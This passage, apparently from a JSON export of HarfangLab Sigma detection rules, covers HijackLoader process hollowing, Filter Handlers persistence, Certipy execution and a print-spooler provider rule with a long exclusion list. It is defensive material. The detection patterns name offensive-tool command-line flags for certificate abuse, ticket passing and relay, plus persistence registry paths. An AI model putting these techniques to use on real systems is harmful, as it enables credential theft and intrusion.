'\\Set-up.exe'\n\n selection_parent:\n ParentImage: '?:\\Windows\\SysWOW64\\more.com'\n\n filter_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a1e6461-19e3-4d1c-98d6-49e65f012252",
"rule_name": "Execution Related to HijackLoader",
"rule_description": "Detects the execution of the 32-bit version of more.com.\nHijackLoader executes the 32-bit version of more.com from the malware for process hollowing purposes.\nHijackLoader is a defense-evasion-oriented loader relying mostly on DLL Sideloading and a custom variant of Process Hollowing.\nIt usually drops stealers as its final payloads.\nIt is recommended to check any children of the more.com process and the activities of the parent for other malicious behavior.\n",
"rule_creation_date": "2024-09-16",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a399726-1f85-453e-af29-8b49596803de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072388Z",
"creation_date": "2026-03-23T11:45:34.072390Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072395Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/search/-search-ifilter-registering-filters",
"https://persistence-info.github.io/Data/ifilters.html",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_filter_handlers.yml",
"content": "title: Possible Filter Handlers Persistence Added\nid: 4a399726-1f85-453e-af29-8b49596803de\ndescription: |\n Detects the creation or edition of the Filter Handlers registry keys that allows dll execution on specific file extension openings.\n This method is used as a means to achieve persistence by putting a malicious DLL as a filter handler.\n The DLL is loaded when a file of the extension is opened.\n It is recommended to investigate the process that sets the registry value for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/search/-search-ifilter-registering-filters\n - https://persistence-info.github.io/Data/ifilters.html\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith:\n - 'HKLM\\Software\\Classes\\.*\\PersistentHandler'\n - 'HKLM\\Software\\Classes\\CLSID\\{????????-????-????-????-????????????}\\PersistentAddinsRegistered'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a399726-1f85-453e-af29-8b49596803de",
"rule_name": "Possible Filter Handlers Persistence Added",
"rule_description": "Detects the creation or modification of the Filter Handlers registry keys, which allow DLL execution when files with specific extensions are opened.\nThis method can be used to achieve persistence by registering a malicious DLL as a filter handler.\nThe DLL is loaded when a file with that extension is opened.\nIt is recommended to investigate the process that sets the registry value for suspicious activities.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a452d8f-d9b8-48d3-a992-b3b40e438513",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091124Z",
"creation_date": "2026-03-23T11:45:34.091126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091130Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ly4k/Certipy",
"https://posts.specterops.io/certified-pre-owned-d95910965cd2",
"https://attack.mitre.org/techniques/T1649"
],
"name": "t1649_local_certipy_execution.yml",
"content": "title: Local Certipy Execution\nid: 4a452d8f-d9b8-48d3-a992-b3b40e438513\ndescription: |\n Detects Certipy, an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS).\n AD CS is a Microsoft technology that provides public key infrastructure (PKI) functionality to create, manage, and distribute digital certificates.\n These certificates are used for various security protocols such as SSL/TLS, signing code, and encrypting emails or files.\n This rule detects different command-lines associated with the local usage of the Certipy tool which is used by adversaries to enumerate, manage and forge domain certificates.\n It is recommended to investigate the source of the offending processes to determine if the action taken with this tool was malicious\nreferences:\n - https://github.com/ly4k/Certipy\n - https://posts.specterops.io/certified-pre-owned-d95910965cd2\n - https://attack.mitre.org/techniques/T1649\ndate: 2024/07/11\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1649\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Certipy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - OriginalFileName: 'certipy.exe'\n - Image|endswith: '\\certipy.exe'\n - Description|contains: 'certipy'\n\n selection_cmdline_1:\n CommandLine|contains|all:\n - ' -target '\n - ' -ca '\n - ' -upn '\n\n selection_cmdline_2:\n CommandLine|contains:\n - ' -ca-pfx '\n - ' -kirbi'\n - ' -old-bloodhound'\n - ' -bloodhound'\n - ' -vulnerable'\n\n selection_auth:\n CommandLine|contains|all:\n - ' auth '\n - ' -pfx '\n\n selection_ptt:\n CommandLine|contains|all:\n - ' ptt '\n - ' -req '\n - ' -u'\n\n relay_1:\n CommandLine|contains: ' relay '\n\n relay_2:\n CommandLine|contains:\n - ' -target '\n - ' -ca '\n\n account_1:\n CommandLine|contains|all:\n - ' account '\n - ' -u'\n\n 
account_2:\n CommandLine|contains:\n - ' create'\n - ' read'\n - ' update'\n - ' delete'\n\n shadow_1:\n CommandLine|contains: ' shadow '\n\n shadow_2:\n CommandLine|contains:\n - ' list'\n - ' add'\n - ' remove'\n - ' clear'\n - ' info'\n - ' auto'\n\n exclusion_microsoft:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_dropbox:\n ProcessSigned: 'true'\n ProcessSignature: 'Dropbox, Inc'\n\n exclusion_certutil:\n CommandLine|contains: 'certutil '\n\n exclusion_pdf:\n CommandLine|endswith: '.pdf'\n\n exclusion_firefox:\n ProcessImage: '?:\\Program Files\\Mozilla Firefox\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n exclusion_git:\n - ProcessImage|endswith: '\\git.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Johannes Schindelin'\n - ProcessImage:\n - '?:\\Program Files\\Git\\bin\\bash.exe'\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - ProcessParentImage:\n - '?:\\Program Files\\Git\\bin\\bash.exe'\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n\n exclusion_vlc:\n ProcessImage|endswith: '\\vlc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'VideoLAN'\n\n exclusion_jetbrains:\n ProcessImage|endswith: '\\runnerw.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JetBrains s.r.o.'\n\n exclusion_vscode:\n ParentImage:\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n GrandparentImage:\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n exclusion_irfanview:\n ParentImage: '?:\\Program 
Files\\IrfanView\\i_view64.exe'\n\n condition: (1 of selection_* or all of account_* or all of shadow_* or all of relay_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a452d8f-d9b8-48d3-a992-b3b40e438513",
"rule_name": "Local Certipy Execution",
"rule_description": "Detects Certipy, an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS).\nAD CS is a Microsoft technology that provides public key infrastructure (PKI) functionality to create, manage, and distribute digital certificates.\nThese certificates are used for various security protocols such as SSL/TLS, signing code, and encrypting emails or files.\nThis rule detects different command lines associated with the local usage of the Certipy tool, which is used by adversaries to enumerate, manage and forge domain certificates.\nIt is recommended to investigate the source of the offending processes to determine whether the action taken with this tool was malicious.\n",
"rule_creation_date": "2024-07-11",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1649"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a77686d-2ab7-4cde-9662-336a29faed1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607466Z",
"creation_date": "2026-03-23T11:45:34.607469Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607477Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1574_spoolsv_new_provider.yml",
"content": "title: Spoolsv Print Provider Added\nid: 4a77686d-2ab7-4cde-9662-336a29faed1a\ndescription: |\n Detects the installation of a new print provider.\n Attackers may install new print provider services to exploit vulnerabilities in the printer service (such as CVE-2021-1675) and gain code execution through the spoolsv binary.\n It is recommended to analyze the DLL pointed to by the registry value to determine its legitimacy, as well as to look for malicious actions originating from the spoolsv process.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1055\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.Spooler\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Image|endswith: '\\spoolsv.exe'\n # NOTE: spoolsv AddNewProvidor function is in charge of writting it.\n # HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz-{438047e2-911d-4073-9be6-be3530c13385}-reallylegitprinter\\Configuration File\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-?\\\\*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows NT x86\\Drivers\\Version-?\\\\*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows ARM64\\Drivers\\Version-?\\\\*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows IA64\\Drivers\\Version-?\\\\*\\Configuration File'\n\n 
exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate_drivers:\n - Details:\n - 'PS5UI.DLL'\n - 'PS5UI.DLL?'\n TargetObject|endswith:\n - '\\Version-3\\Adobe PDF Converter\\Configuration File'\n - '\\Version-3\\BluebeamPSDriver\\Configuration File'\n - '\\Version-3\\PDF24\\Configuration File'\n - '\\Version-3\\Brother *\\Configuration File'\n - '\\Version-3\\FaxManager\\Configuration File'\n - '\\Version-3\\PDFCreator\\Configuration File'\n - '\\Version-3\\Xerox *\\Configuration File'\n - '\\Version-3\\Toshiba * PS3\\Configuration File' # (seen Toshiba Universal PS, Toshiba Generic Printer PS3)\n - '\\Version-3\\KONICA MINOLTA *\\Configuration File'\n - '\\Version-3\\MS Publisher *\\Configuration File' # (seen MS Publisher Color Printer, MS Publisher Imagesetter)\n - '\\Version-3\\Lexmark *\\Configuration File'\n - '\\Version-3\\HP *\\Configuration File' # (seen HP Color LaserJet 2800 Series PS)\n - '\\Version-3\\Toshiba e-STUDIO*\\Configuration File' # (seen Toshiba e-STUDIO3500c PS3)\n - '\\Version-3\\Ricoh *\\Configuration File' # (seen Ricoh Aficio MP 3500 PS / RICOH SP 3600DN PS)\n - '\\Version-3\\LANIER *\\Configuration File' # (seen LANIER SP 3600DN PS)\n - '\\Version-3\\Roland VersaWorks Dual\\Configuration File'\n - '\\Version-3\\VersaWorks\\Configuration File'\n - '\\Version-3\\PS Driver for Universal Print\\Configuration File'\n - '\\Version-3\\Wondershare PDFelement\\Configuration File'\n - '\\Version-3\\Gestetner *\\Configuration File' # (Gestetner MP CW2200 PS)\n - '\\Version-3\\Kyocera *\\Configuration File' # (Kyocera TASKalfa 5004i (KPDL))\n - '\\Version-3\\Oce PRISMAaccess Web driver\\Configuration File'\n - '\\Version-3\\TP Output Gateway PS\\Configuration File'\n - '\\Version-3\\Nitro PDF Driver *\\Configuration File' # (Nitro PDF Driver 13)\n - '\\Version-3\\CutePDF Writer v?.?\\Configuration File' # (CutePDF Writer v3.2, CutePDF Writer v4.0)\n - '\\Version-3\\uniFLOW Universal Driver\\Configuration File'\n - 
'\\Version-3\\ES*\\Configuration File' # (ES7170 MFP(PS))\n - '\\Version-3\\Samsung *\\Configuration File' # (Samsung ML-371x Series PS)\n - Details:\n - 'FXSUI.DLL'\n - 'FXSUI.DLL?'\n TargetObject|endswith: '\\Version-3\\Microsoft Shared Fax Driver\\Configuration File'\n - Details:\n - 'E_?UIC??E.DLL'\n - 'E_?UIC??E.DLL?'\n TargetObject|endswith: '\\Version-3\\Epson *\\Configuration File' # (Epson SX125 Series)\n - Details:\n - 'PrintConfig.dll'\n - 'PrintConfig.dll?'\n TargetObject|endswith: '\\Version-3\\Microsoft enhanced Point and Print compatibility driver\\Configuration File'\n - Details:\n - 'unidrvui.dll'\n - 'unidrvui.dll?'\n TargetObject|endswith:\n - '\\Version-3\\Webex Document Loader\\Configuration File'\n - '\\Version-3\\uniFLOW Universal PclXL Driver\\Configuration File'\n - '\\Version-3\\Send to Microsoft OneNote *\\Configuration File'\n - '\\Version-3\\HP*\\Configuration File'\n - '\\Version-3\\Toshiba *\\Configuration File'\n - '\\Version-3\\Generic / Text Only\\Configuration File'\n - '\\Version-3\\Ricoh Aficio *\\Configuration File'\n - '\\Version-3\\RICOH imagio *\\Configuration File'\n - '\\Version-3\\Xerox *\\Configuration File'\n - '\\Version-3\\Fax - HP ENVY 7640 series\\Configuration File'\n - '\\Version-3\\Snagit ?? 
Printer\\Configuration File'\n - '\\Version-3\\Sharp *\\Configuration File'\n - '\\Version-3\\Nuance *\\Configuration File' # (Nuance Image Printer Driver, Nuance Universal Print Driver)\n - '\\Version-3\\Kyocera *\\Configuration File'\n - '\\Version-3\\Lexmark *\\Configuration File'\n - '\\Version-3\\XPS Card Printer\\Configuration File'\n - '\\Version-3\\Canon *\\Configuration File'\n - '\\Version-3\\DYMO *\\Configuration File'\n - '\\Version-3\\NoMachine Printer\\Configuration File'\n - '\\Version-3\\Samsung *\\Configuration File' # Samsung CLP-350 Series PCL6\n - '\\Version-3\\Epson *\\Configuration File' # Epson AL-2600\n - '\\Version-3\\KONICA *\\Configuration File' # KONICA MINOLTA C353 Series XPS\n - '\\Version-3\\Dell *\\Configuration File' # Dell 2350dn Laser Printer XL\n - '\\Version-3\\Microsoft XPS Document Writer\\Configuration File'\n - '\\Version-3\\NRG *\\Configuration File' # (NRG MP C2500 PCL5c)\n - '\\Version-3\\Generic IBM *\\Configuration File' # (Generic IBM Graphics 9pin wide)\n - '\\Version-3\\Brother *\\Configuration File' # (Brother PCL5e Driver)\n - '\\Version-3\\Wildix FaxPrinter\\Configuration File'\n - '\\Version-3\\Evolis Primacy\\Configuration File'\n - Details:\n - 'CN?????.DLL' # (seen CNMUIAE.DLL, CNMUICS.DLL, CNMUIEO.DLL, cnmepui.dll, CNCAUD0.DLL)\n - 'CN??????.DLL' # (seen CNWTNMUI.DLL)\n - 'CN???MUI_D????.DLL'\n - 'CN???MUI_D????.DLL?'\n TargetObject|endswith: '\\Version-3\\Canon *\\Configuration File'\n - Details:\n - 'f??vpr_ui.dll'\n - 'f?vpr_ui.dll'\n TargetObject|endswith:\n - '\\Version-3\\Foxit * Printer Driver\\Configuration File'\n - '\\Version-3\\Print to Evernote Driver\\Configuration File'\n - '\\Version-3\\Phantom * Driver\\Configuration File'\n - Details:\n - 'hpm?????.dll'\n - 'hpm??????.dll' # (hpm1210su.dll)\n - 'HPM????????.DLL' # (HPM1210FPSU.DLL)\n - 'hp??????.DLL' # (hpipi7th.DLL,hpltcfg6.dll)\n - 'suhp????.dll' # (suhp1020.dll)\n TargetObject|endswith: '\\Version-3\\HP *\\Configuration File'\n - 
Details:\n - 'rica??ui.dll'\n - 'ricu??ui.dll'\n - 'rica??us.dll'\n - '0riu0???.dll'\n TargetObject|endswith:\n - '\\Version-3\\RICOH *\\Configuration File'\n - '\\Version-3\\PCL6 Driver for Universal Print\\Configuration File'\n - '\\Version-3\\Gestetner *\\Configuration File'\n - '\\Version-3\\LANIER *\\Configuration File' # (LANIER SP 4310N PCL 6)\n - Details:\n - 'pxcdrvL.dll'\n - 'PXC?0UIf.DLL'\n - 'pxcdrv.dll'\n TargetObject|endswith: '\\Version-3\\PDF-XChange *\\Configuration File'\n - Details: 'tsprint.dll'\n TargetObject|endswith: '\\Version-3\\Remote Desktop Easy Print\\Configuration File'\n - Details: 'acpdfui???.dll'\n TargetObject|endswith:\n - '\\Version-3\\Amyuni Document Converter *\\Configuration File'\n - '\\Version-3\\AutoVue Document Converter *500\\Configuration File'\n - Details: 'KO?????C.DLL' # (KOAYXS_C.DLL, KOFXOJ1C.DLL)\n TargetObject|endswith: '\\Version-3\\KONICA MINOLTA *\\Configuration File'\n - Details:\n - 'bs??????.DLL' # (bsp15bU6.DLL)\n - 'BS?????.DLL' # (BSQ70UI.DLL)\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details: 'EFXUI??A.DLL'\n TargetObject|endswith:\n - '\\Version-3\\Epson *\\Configuration File'\n - '\\Version-3\\Canon *\\Configuration File'\n - Details: 'BRUI???A.DLL'\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details:\n - 'uh004du.dll'\n - 'uh004du.dll?'\n TargetObject|endswith: '\\Version-3\\HP Color Laser *\\Configuration File'\n - Details: 'K?UU????.DLL' # (KXUU10xm.DLL)\n TargetObject|endswith:\n - '\\Version-3\\Kyocera *\\Configuration File'\n - '\\Version-3\\KX DRIVER for Universal Printing\\Configuration File'\n - '\\Version-3\\\\????i KX\\Configuration File'\n - '\\Version-3\\\\?????i KX\\Configuration File'\n - '\\Version-3\\Universal Printing System (UTAX/TA)\\Configuration File'\n - Details:\n - 'hpb6sy????_*gui.dll'\n - 'hpbxjConfig????.dll' # (hpbxjConfig1301.dll)\n - 'hp????su.dll' # (hp1100su.dll)\n TargetObject|endswith: '\\Version-3\\HP 
*\\Configuration File'\n - Details: 'S??EU.DLL' # (seen SU0EU.DLL, SSOEU.DLL)\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details:\n - 'Cpxpsupdui.dll'\n - 'Cpupdui.dll'\n - 'acfpdfuiamd64.dll'\n TargetObject|endswith: '\\Version-3\\Citrix *\\Configuration File'\n - Details:\n - 'ZDesignerui.dll'\n - 'ZDNui56.dll'\n TargetObject|endswith:\n - '\\Version-3\\ZDesigner *\\Configuration File' # (ZDesigner ZD500R-300dpi ZPL, ZDesigner GK420t)\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\Zebra *\\Configuration File' # (Zebra ZP 450-200 dpi, Zebra ZP 500 (EPL))\n - Details: 'pdfprnui.dll'\n TargetObject|endswith: '\\Version-3\\\\* PDF Producer Driver\\Configuration File'\n - Details: 'pt#epl-u.d64'\n TargetObject|endswith: '\\Version-3\\POSTEK *\\Configuration File' # (POSTEK C168/300s)\n - Details: 'sht13cdu.dll'\n TargetObject|endswith: '\\Version-3\\HP Color Laser *\\Configuration File' # HP Color Laser MFP 178 179\n - Details: 'KMREDrvUI.DLL' # K Comer\n TargetObject|endswith:\n - '\\Version-3\\RX416\\Configuration File'\n - '\\Version-3\\RE418\\Configuration File'\n - '\\Version-3\\CX418\\Configuration File'\n - '\\Version-3\\RX106F\\Configuration File'\n - Details: 'znsprnui.dll'\n TargetObject|endswith: '\\Version-3\\DocuCom PDF Driver\\Configuration File'\n - Details: 'udcdrv.dll'\n TargetObject|endswith: '\\Version-3\\Universal Document Converter\\Configuration File'\n - Details: 'us008du.dll'\n TargetObject|endswith: '\\Version-3\\Samsung Universal Print Driver*\\Configuration File'\n - Details:\n - 'eng53Ku.DLL'\n - 'GXE6???.DLL' # (GXE6KAU.DLL)\n - 'GXE6??.DLL' # (GXE6MU.DLL, GXE6NU.DLL)\n TargetObject|endswith: '\\Version-3\\RICOH *\\Configuration File'\n - Details: 'Seagull_V3_ConfigDispatcher.dll'\n TargetObject|endswith:\n - '\\Version-3\\Brady *\\Configuration File'\n - '\\Version-3\\TEC *\\Configuration File' # (TEC B-SX4T (203 dpi))\n - '\\Version-3\\Intermec 
*\\Configuration File' # (Intermec PM43c (203 dpi))\n - '\\Version-3\\EasyCoder *\\Configuration File' # (EasyCoder PF4i (203 dpi) - DP)\n - Details: 'CRDGUI.DLL'\n TargetObject|endswith: '\\Version-3\\CP Printer\\Configuration File'\n - Details: 'fra????.DLL'\n TargetObject|endswith:\n - '\\Version-3\\Gestetner *\\Configuration File' # fra56Gu.DLL\n - '\\Version-3\\RICOH *\\Configuration File' # fra50Fu.DLL\n - '\\Version-3\\LANIER *\\Configuration File' # fra53Ku.DLL\n - Details: 'GPCUTUI64.DLL'\n TargetObject|endswith: '\\Version-3\\Graphtec *\\Configuration File'\n - Details: 'ss#???-u.d64' # (ss#tec-u.d64, ss#tsc-u.d64)\n TargetObject|endswith:\n - '\\Version-3\\TEC *\\Configuration File' # (TEC B-SX4)\n - '\\Version-3\\Brady *\\Configuration File' # (Brady BBP11-34L)\n - Details: 'do#dpl-u.d64'\n TargetObject|endswith: '\\Version-3\\Datamax*\\Configuration File' # (Datamax-O'Neil E-4205A Mark III)\n - Details: 'CWBAFPUI.DLL'\n TargetObject|endswith: '\\Version-3\\IBM *\\Configuration File' # (IBM Infoprint 2085 AFP)\n - Details: 'RIC????.DLL' # (RIC66Ku.DLL, RIC643u.DLL)\n TargetObject|endswith:\n - '\\Version-3\\E-22C *\\Configuration File' # (E-22C PCL 6)\n - '\\Version-3\\RICOH *\\Configuration File' # (RICOH Aficio SP 8100DN PCL 6)\n - Details: 'vspdfui.dll'\n TargetObject|endswith: '\\Version-3\\Visage PDF\\Configuration File'\n - Details: 'dellopd.uiproxy.dll'\n TargetObject|endswith: '\\Version-3\\Dell *\\Configuration File' # (Dell Open Print Driver (PCL 5))\n - Details: 'sznprnui.dll'\n TargetObject|endswith:\n - '\\Version-3\\PowerPDF\\Configuration File'\n - '\\Version-3\\NuancePDF\\Configuration File'\n - Details:\n - 'OPPQ_UI.DLL'\n - 'OK?????.DLL' # (OKBBAPG.DLL, OKXLUI2.DLL, OKBL_UI.DLL)\n - 'OPAM_UI.DLL'\n TargetObject|endswith:\n - '\\Version-3\\OKI *\\Configuration File' # (OKI C9850(PCL), OKI B710n(PCL))\n - '\\Version-3\\ES*\\Configuration File' # (ES7131(PCL))\n - Details: 'TPPrnUI.DLL'\n TargetObject|endswith: '\\Version-3\\TP Output 
Gateway\\Configuration File'\n - Details: 'MDP???????.DLL' # (MDPS5UIx64.DLL)\n TargetObject|endswith: '\\Version-3\\MailevaDirect\\Configuration File'\n - Details: 'th-2500ui.dll'\n TargetObject|endswith: '\\Version-3\\TH-2500\\Configuration File'\n - Details: 'JgUI.DLL'\n TargetObject|endswith: '\\Version-3\\Zebra *\\Configuration File' # (Zebra ZC150 USB Card Printer)\n - Details: 'Bravo2_u.dll'\n TargetObject|endswith: '\\Version-3\\Disc Publisher II\\Configuration File'\n - Details: 'PT_DPPro_u.dll'\n TargetObject|endswith: '\\Version-3\\Disc Publisher Pro Xi\\Configuration File'\n - Details: 'PT_DPPro_u.dll'\n TargetObject|endswith: '\\Version-3\\Disc Publisher Pro Xi\\Configuration File'\n - Details: 'in#idp-u.d64'\n TargetObject|endswith:\n - '\\Version-3\\Intermec *\\Configuration File' # (Intermec PM43c (300 dpi))\n - '\\Version-3\\EasyCoder *\\Configuration File' # (EasyCoder PF4i (203 dpi) - DP)\n - Details: 'novaui?.dll'\n TargetObject|endswith: '\\Version-3\\novaPDF ?\\Configuration File'\n - Details: 'G2PrintUPDUI_x64.dll'\n TargetObject|endswith: '\\Version-3\\GoToMyPC UPD Driver\\Configuration File'\n - Details:\n - 'pdfsam enhanced_pdfprnui_v*.dll' # (pdfsam enhanced_pdfprnui_v.6.11.0.7.dll)\n - 'brand_solution_name_pdfprnui_v*.dll' # (brand_solution_name_pdfprnui_v.6.11.0.7.dll)\n - 'suite_pdfprnui_v*.dll' # (suite_pdfprnui_v.4.12.26.3.dll)\n - 'soda_pdfprnui_v*.dll' # (soda_pdfprnui_v.pdf architect_pdfprnui_v.4.12.26.3.dll6.11.0.7.dll)\n - 'architect_pdfprnui_v*.dll' # (architect_pdfprnui_v.4.12.26.3.dll)'\n - 'pdf architect_pdfprnui_v*.dll' # (pdf architect_pdfprnui_v.4.12.26.3.dll)\n TargetObject|endswith:\n - '\\Version-3\\PDFsam Enhanced *\\Configuration File'\n - '\\Version-3\\PDF Architect *\\Configuration File' # (PDF Architect 7 Driver, PDF Architect 8 Driver)\n - '\\Version-3\\PDF Suite *\\Configuration File' # (PDF Suite 2020 Driver)\n - '\\Version-3\\Soda PDF *\\Configuration File' # (Soda PDF Desktop 12 Driver)\n - Details: 
